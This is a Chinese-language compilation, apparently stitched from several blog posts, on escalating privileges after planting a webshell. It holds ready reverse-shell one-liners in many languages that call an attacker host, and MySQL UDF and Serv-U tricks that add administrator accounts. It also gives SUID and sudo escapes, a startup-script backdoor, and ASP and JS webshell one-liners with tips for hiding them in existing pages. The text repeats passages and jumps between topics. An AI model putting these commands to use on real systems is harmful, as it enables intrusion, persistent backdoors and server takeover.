最全的WEBSHELL提权大大全

MySQL提权之udf提权（获得webshell的情况）什么是udf提权？MySQL提供了⼀个让使⽤者⾃⾏添加新的函数的功能，这种⽤户⾃⾏扩展函数的功能就叫udf。

它的提权原理也⾮常简单！即是利⽤了root ⾼权限，创建带有调⽤cmd的函数的udf.dll动态链接库！这样⼀来我们就可以利⽤ system权限进⾏提权操作了！当我们拿到webshell后，由于中间件,例如，apache使⽤了较低的权限，可能仅仅是个⽹络服务的权限，然后我们就需要进⾏提权，⽽有时候⽬标机器补丁较全，各种系统提权姿势都失效的情况下，可以将⽬光转义到数据库服务上，在Windows下，在较低版本的mysql（<5.6）安装时默认是系统权限。

还有就是很多⼈图⽅便，例如使⽤了各种集成环境，未做安全设置，直接⽤⾼权限账户进⾏站点配置，就可以考虑⽤UDF进⾏提权。

dll⽂件的好处？1.扩展了应⽤程序的特性;2.可以⽤许多种编程语⾔来编写;3.简化了软件项⽬的管理;4.有助于节省内存;5.有助于资源共享;什么是udf库？UDF表⽰的是MySQL中的⽤户⾃定义函数。

这就像在DLL中编写⾃⼰的函数并在MySQL中调⽤它们⼀样。

我们将使⽤“lib_mysqludf_sys_64.dll”DLL 库不同版本的区别：MySql < 4.1:允许⽤户将任何的DLL⽂件⾥⾯的函数注册到MySql⾥。

MySql 4.1-5.0：对⽤来注册的DLL⽂件的位置进⾏了限制，通常我们选择 UDF导出到系统⽬录C:/windows/system32/来跳过限制。

MySql >=5.1:这些DLL只能被放在MySql的plugin⽬录下。

0x01 提权的前提1. 必须是root权限（主要是得创建和抛弃⾃定义函数）2. secure_file_priv=(未写路径)3. 将udf.dll⽂件上传到MySQL的plugin⽬录下（这⾥以MySQL>=5.1为例）0x02 开始提权这⾥以本地为例1.我们这⾥上传了⼀句话，然后⽤菜⼑连接上先判断数据库版本select version();符合MySql>=5.1的情况。

常见提权方法1. 用户提权：用户提权是指普通用户通过某种方式获取管理员权限或超级用户权限的行为。

常见的用户提权方法包括：利用弱密码、使用系统漏洞、利用特权提升程序等。

详细描述：用户提权是黑客经常使用的一种手段，通过获取管理员权限，黑客可以执行更高级别的操作，如修改系统配置、访问敏感文件等。

利用弱密码是最常见的用户提权方法之一。

黑客可以使用密码破解工具或暴力破解技术尝试猜解用户密码，一旦成功登录系统，就可以获取管理员权限。

系统漏洞也是用户提权的常见方法之一。

黑客可以通过渗透测试或漏洞扫描等方式发现系统中的漏洞，然后利用这些漏洞获取管理员权限。

某个系统可能存在一个未修补的漏洞，黑客可以利用这个漏洞上传特制的脚本，从而获得系统的控制权。

黑客还可以利用特权提升程序来提权。

这些程序的功能是在受限的用户权限下执行特权操作，如创建新用户、修改用户组等。

黑客可以通过执行这些特权提升程序来获取管理员权限，从而获得系统的完全控制权。

2. 命令注入：命令注入是指黑客通过在输入框或URL参数中注入恶意命令，从而执行非授权的操作。

常见的命令注入方法包括：通过修改URL参数、利用操作系统命令执行漏洞等。

详细描述：命令注入是一种常见的网络攻击手法，黑客通过在输入框或URL参数中注入恶意命令，从而执行非授权的操作。

黑客可以在一个搜索框中输入特定的字符串，以执行系统命令，或是通过改变URL参数来获取系统权限。

命令注入通常利用了操作系统的命令执行漏洞。

当用户传递的输入被直接用于构造系统命令时，如果没有正确进行输入验证和过滤，黑客就可以通过构造恶意输入来执行非授权的操作。

这种攻击方式在许多Web应用程序中非常常见，如论坛、博客等。

为了防止命令注入攻击，开发者应该始终对用户输入进行适当的验证和过滤。

可以使用特定的字符过滤器来禁止或转义危险的字符，或是通过使用参数化查询和预编译语句等方式防止SQL注入。

3. 文件包含漏洞：文件包含漏洞是指黑客通过利用应用程序中的文件包含功能来执行恶意代码。

webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本，通常用于攻击者在受害者的服务器上执行恶意操作。

MSF（Metasploit Framework）是一种流行的渗透测试工具，可以用于执行各种攻击和提权操作。

以下是使用MSF进行Webshell提权的一般步骤：
1. 获取Webshell：首先，攻击者需要将Webshell上传到受害者的服务器上。

这可以通过多种方式完成，例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。

2. 扫描目标：一旦Webshell上传成功，攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。

这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。

3. 执行攻击：一旦攻击者确定了潜在的提权机会，他们可以使用MSF的各种攻击模块来尝试提权。

这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。

4. 获取权限：如果攻击成功，攻击者将获得对目标服务器的权限。

这可能包括管理员权限或其他高权限。

需要注意的是，这些步骤只是一个一般性的概述，并且实际情况可能因目标系统和环境而异。

此外，使用这些技术进行非法活动是非法的，并且可能导致严重的法律后果。

因此，建议仅在合法和授权的情况下使用这些技术。

说到花了九牛二虎的力气获得了一个webshell，当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～嘻嘻～～好跟我来，看看有什么可以利用的来提升权限第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了第二有很多小黑问我这么把webshell的iis user权限提升一般服务器的管理都是本机设计完毕然后上传到空间里，那么就会用到ftp，服务器使用最多的就是servu那么我们就利用servu来提升权限通过servu提升权限需要servu安装目录可写～好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限然后去servu安装目录里把ServUDaemon.ini更换服务器上的。

用我新建的用户和密码连接～好的，还是连上了ftpftp>open ipConnected to ip.220 Serv-U FTP Server v5.0.0.4 for WinSock ready...User (ip:(none)): id //刚才添加的用户331 User name okay, please send complete E-mail address as password. Password:password //密码230 User logged in, proceed.ftp> cd winnt //进入win2k的winnt目录250 Directory changed to /WINNTftp>cd system32 //进入system32目录250 Directory changed to /WINNT/system32ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。

webshell的分类Webshell可以按照其功能、原理和用途进行分类。

1. 命令执行型Webshell：这些Webshell通常允许攻击者在受感染的系统上执行命令，可以用来浏览文件、上传/下载文件、修改配置文件、执行系统命令等。

2. 文件管理型Webshell：这些Webshell提供了类似于文件管理器的界面，允许攻击者通过上传、下载、删除和编辑文件来管理受感染系统的文件系统。

3. 数据库管理型Webshell：这些Webshell专门用于管理数据库，允许攻击者执行SQL查询、添加/删除/修改数据库中的数据，以及执行其他与数据库相关的操作。

4. 弱口令猜解型Webshell：这些Webshell通过尝试猜解目标系统的用户名和密码来获取对系统的控制权限。

5. 反弹Shell型Webshell：这些Webshell利用系统上开放的网络服务，如FTP、SMTP、HTTP等，将命令结果反馈给攻击者的控制服务器，以实现远程控制。

6. 文件上传型Webshell：这些Webshell的主要功能是将自身安装到目标服务器上，通常是通过上传恶意文件来实现的。

7. 被动式Webshell：这些Webshell充当拦截器，截获正常用户对目标系统的请求，并将其重定向到攻击者控制的Webshell页面。

8. 混淆型Webshell：这些Webshell使用各种技术和方法来混淆其代码，使其更难被检测和分析。

需要注意的是，这些分类是相对的，有些Webshell可能具备多种功能。

此外，Webshell的进化和技术不断更新，新的类型和变种不断出现，因此对Webshell的分类是一个动态的过程。

提权以及反弹shell⼀些⽅法提权以及反弹shellnetcat反弹shellkali中使⽤nc(netcat)进⾏监听⽤法 : nv -lvvp 2333(端⼝号)靶机中使⽤ bash -c 'bash -i >&/dev/tcp/192.168.1.1/2333 0>&1' 同样可以写成⼀句话⽊马进⾏反弹shell。

命令提权1、使⽤suid提权，找到⼀个属于root的具有s权限的⽂件；s是提权符find / -user root -perm -4000 -print 2>/dev/nullfind / -perm -u=s -type f 2>/dev/nullfind / -user root -perm -4000 -exec ls -ldb {} \;例如：在DC-1中，⾸先touch新建⼀个⽂件，然后执⾏touch abcdfind abcd -exec whoami \;find / -name abcd -exec "/bin/sh" \; #分号需要转义，find以分号结尾具有提权功能的Linux可执⾏⽂件包括：nmapvimfindbashmorelessnanocppython反弹shell#!/usr/bin/pythonimport os,subprocess,sockets=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect(("攻击机IP地址","攻击机监听端⼝"))os.dup2(s.fileno(),0)os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","-i"])其他⼀些⽅法#bash版本：bash -i >& /dev/tcp/10.0.0.1/8080 0>&1#perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' #python版本：python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'#php版本：php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'#ruby版本：ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'#nc版本：nc -e /bin/sh 10.0.0.1 1234rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fnc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999#java版本r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()#lualua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"git提权sudo -l 查看具有sudo执⾏权限的命令sudo git -p help或者 sudo git help config!/bin/bashzip提权touch exploitsudo -u root zip exploit.zip exploit -T --unzip-command="sh -c /bin/bash"tar提权收集信息：内外⽹服务器系统和版本位数服务器的补丁情况服务器的安装软件情况服务器的防护软件情况端⼝情况⽀持脚本情况信息收集常⽤命令：Windows:ipconfig /allnet usernetstat -anoversysteminfotasklist /svctaskkill -PID pid号taskkill /im qq.exe /fnet user test 123456 /addnet localgroup administrators test /addwhoamiCMD⽆法执⾏1、防护软件拦截2、CMD被降权3、组件被删除找可读写⽬录上传cmd.exe，将执⾏的cmd.exe路径替换成上传的路径查找3389端⼝1、注册表读取2、⼯具扫描3、命令探针端⼝转发lcx⽹站服务器是内⽹IP：192.168.2.3外⽹服务器IP是：192.168.80.151在内⽹服务器上执⾏的lcx命令是：lcx.exe -slave 192.168.80.151 51 192.168.2.3 3389在外⽹服务器上执⾏的lcx命令是：lcx.exe -listen 51 3389数据库提权MSSQL提权：安装组件--->开启3389---->创建⽤户------>提升权限------>完成Mysql提权：1、udf提权获取到对⽅数据库⽤户root的账号密码查看⽹站源码⾥⾯数据库配置⽂件(common,config.php,common.inc.php,data)查看数据库的配置⽂件暴⼒破解、mysql密码破解、3306端⼝⼊侵udf提权原理：通过root权限导出udf.dll到系统⽬录下，可以通过udf.dll调⽤执⾏cmd导出到\lib/plugin\安装⽬录下create function cmdshell returns string soname 'udf.dll'select cmdshell('net user test 123456 /add');select cmdshell('net localgroup administrators test /add');drop function cmdshell //删除函数2、启动项提权1、查看我们进⼊数据库中有什么表show tables;默认情况下，test中没有任何表的存在关键部分：2、在test数据库下创建⼀个新的表create table a(cmd text);表名为a，字段名为cmd，为text⽂本3、在表中插⼊数据insert into a values ("set wshshell=createobject(""wscript.shell"")");insert into a values ("a=wshshell.run(""cmd.exe /c net user test 123456 /add"",0)");insert into a values ("b=wshshell.run(""cmd.exe /c net localgroup Administrators test /add"",0)")双引号和括号以及后⾯的0⼀定要输⼊，⽤这三条命令建⽴⼀个vbs的脚本程序！4、查看数据表select * form a;5、输出表为⼀个vbs的脚本⽂件select * from a into outfile "c://开机菜单//启动//a.vbs";6、重启3、mof提权4、反连端⼝提权Windows提权:开启3389使⽤批处理⽂件开3389使⽤sql语句开3389使⽤exe开3389使⽤vb开3389使⽤wireshark或cain嗅探3389获取账号名和密码Linux提权：uname -r 查看内核版本信息找到对应版本的exp上传----编译---运⾏----ok。

webshell 的隐藏—隐藏木马后门经验分享1.插马法 其实，我们可以直接把一句话插入已经存在的页面了，但是，问题出来了，像常用的 %execute(request(a))% %execute(request(value))% %eval request(#)% %if request(cnxhacker) then Session(b)=request(cnxhacker) if Session(b) then execute Sess1.插马法其实，我们可以直接把一句话插入已经存在的页面了，但是，问题出来了，像常用的<%execute(request("a"))%> <%execute(request("value"))%> <%eval request("#")%> <%if request("cnxhacker")<>"" thenSession("b")=request("cnxhacker") if Session("b")<>"" then execute Session("b")%> 等等，这些一句话一插进去的话，就会报错，一下就会被发现...其实，我们忽略了一个天天在用的S 端<SCRIPT RUNAT=SERVERLANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT> 冰狐的一句话客户端，这个调用的是Javascript 脚本，跟调用Vbscript 不同，Javascript 是运行在客户端的，也就上一HTML 端，所以我们可以直接把他插入在页面中，而不报错。

最全Windows提权总结（建议收藏）当以低权⽤户进去⼀个陌⽣的windows机器后，⽆论是提权还是后续做什么，第⼀步肯定要尽可能的搜集信息。

知⼰知彼，才百战不殆。

常规信息搜集systeminfo 查询系统信息hostname 主机名net user 查看⽤户信息netstat -ano|find "3389" 查看服务pid号wmic os get caption 查看系统名wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息wmic product get name,version 查看当前安装程序wmic service list brief 查询本机服务wmic process list brief 查询本机进程net share 查看本机共享列表netsh firewall show config 查看防⽕墙配置常见的杀软如下：360sd.exe 360杀毒360tray.exe 360实时保护ZhuDongFangYu.exe 360主动防御KSafeTray.exe ⾦⼭卫⼠SafeDogUpdateCenter.exe 安全狗McAfee McShield.exe McAfeeegui.exe NOD32AVP.exe 卡巴斯基avguard.exe ⼩红伞bdagent.exe BitDefender要搜集的信息⼤致如下⼏点：机器的系统及其版本机器的打补丁情况机器安装的服务机器的防⽕墙策略配置机器的防护软件情况提权简介提权可分为纵向提权与横向提权：纵向提权：低权限⾓⾊获得⾼权限⾓⾊的权限；横向提权：获取同级别⾓⾊的权限。

Windows常⽤的提权⽅法有：系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略⾸选项提权、WEB中间件漏洞提权、DLL劫持提权、滥⽤⾼危权限令牌提权、第三⽅软件/服务提权等1、系统内核溢出漏洞提权#⼿⼯查找补丁情况systeminfo查看补丁wmic qfe get Description,HotFixID,InstalledOn 查看补丁信息#MSF后渗透扫描post/windows/gather/enum_patches利⽤（Vulmap、Wes、WindowsVulnScan）对⽐补丁进⽽进⾏提权2、at命令利⽤在Windows2000、Windows 2003、Windows XP 这三类系统中，我们可以使⽤at命令将权限提升⾄system权限。